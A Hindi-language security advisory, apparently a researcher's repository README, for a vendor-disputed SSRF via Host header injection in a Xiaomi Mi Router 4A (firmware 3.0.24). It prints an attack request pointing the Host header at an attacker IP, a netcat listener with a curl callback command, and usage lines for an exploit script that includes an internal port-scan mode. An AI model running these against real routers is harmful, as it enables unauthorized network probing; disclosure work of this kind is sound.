
अप्रमाणित SSRF में Xiaomi Mi Router 4A Gigabit Edition (firmware 3.0.24) Host Header Injection के माध्यम से — CVE-2026-26898
Xiaomi Mi Router 4A Gigabit Edition में एक सर्वर-साइड रिक्वेस्ट फॉरजरी (SSRF) भेद्यता मौजूद है। राउटर का वेब इंटरफ़ेस HTTP Host हेडर को मान्य करने में विफल रहता है, जिससे एक अनधिकृत हमलावर राउटर को मनमाने आउटबाउंड TCP कनेक्शन बनाने के लिए मजबूर कर सकता है।
| फ़ील्ड | मान |
|---|
| उपकरण | Xiaomi Mi Router 4A Gigabit Edition |
| फर्मवेयर | 3.0.24 (International) |
| CVE | CVE-2026-26898 (विवादित — नीचे प्रकटीकरण स्थिति देखें) |
| CWE | CWE-918 (सर्वर-साइड रिक्वेस्ट फॉरजरी) |
| CVSS 3.1 | 8.6 (उच्च) — शोधकर्ता-मूल्यांकित; विक्रेता गंभीरता पर विवाद करता है |
स्थिति: विक्रेता द्वारा विवादित — इस रिपोर्ट को Xiaomi द्वारा स्वीकार नहीं किया गया।
CVE-2026-26898 का उपयोग यहां केवल ट्रैकिंग के लिए किया गया है; विक्रेता विवाद को देखते हुए इसे विवादित / अपुष्ट माना जाना चाहिए, विक्रेता-पुष्टि नहीं।
GET /cgi-bin/luci/api/xqsystem/login HTTP/1.1
Host: <ATTACKER_IP>:<PORT>

python3 xiaomi_ssrf_exploit.py --target 192.168.31.1 --check
[*] Checking vulnerability on 192.168.31.1...
[*] Local IP: 192.168.31.235
[*] Test Port: 44444
[+] VULNERABLE! Router connected back to 192.168.31.235:44444
# Terminal 1: Start listener
nc -l 4444
# Terminal 2: Send malicious request
curl -H "Host: YOUR_IP:4444" "http://192.168.31.1/cgi-bin/luci/api/xqsystem/login"
| फ़ाइल | विवरण |
|---|---|
xiaomi_ssrf_exploit.py | एकाधिक मोड के साथ पूर्ण एक्सप्लॉइट |
# Check if vulnerable
python3 xiaomi_ssrf_exploit.py --target ROUTER_IP --check
# Callback mode
python3 xiaomi_ssrf_exploit.py --target ROUTER_IP --callback YOUR_IP --port 4444
# Port scanner
python3 xiaomi_ssrf_exploit.py --target ROUTER_IP --scan TARGET_IP --ports 22,23,80,443
| दिनांक | घटना |
|---|---|
| 2026-01-15 | भेद्यता खोजी गयी; PoC विकसित किया गया |
| 2026-01-16 | Xiaomi को HackerOne (#3513458) के माध्यम से रिपोर्ट किया गया |
| 2026-01-23 | Xiaomi ने रिपोर्ट को Informative के रूप में बंद किया (निम्न-जोखिम, ठीक नहीं करेगा) |
| 2026-06-03 | सार्वजनिक सलाह प्रकाशित (यह रिपॉजिटरी) — विक्रेता-विवादित, अनपैच |
यह एक्सप्लॉइट केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए प्रदान किया गया है। कंप्यूटर सिस्टम में अनधिकृत पहुंच अवैध है।
Ahmet Mersin
🌐 ahmetmersin.com
🐙 @iwallplace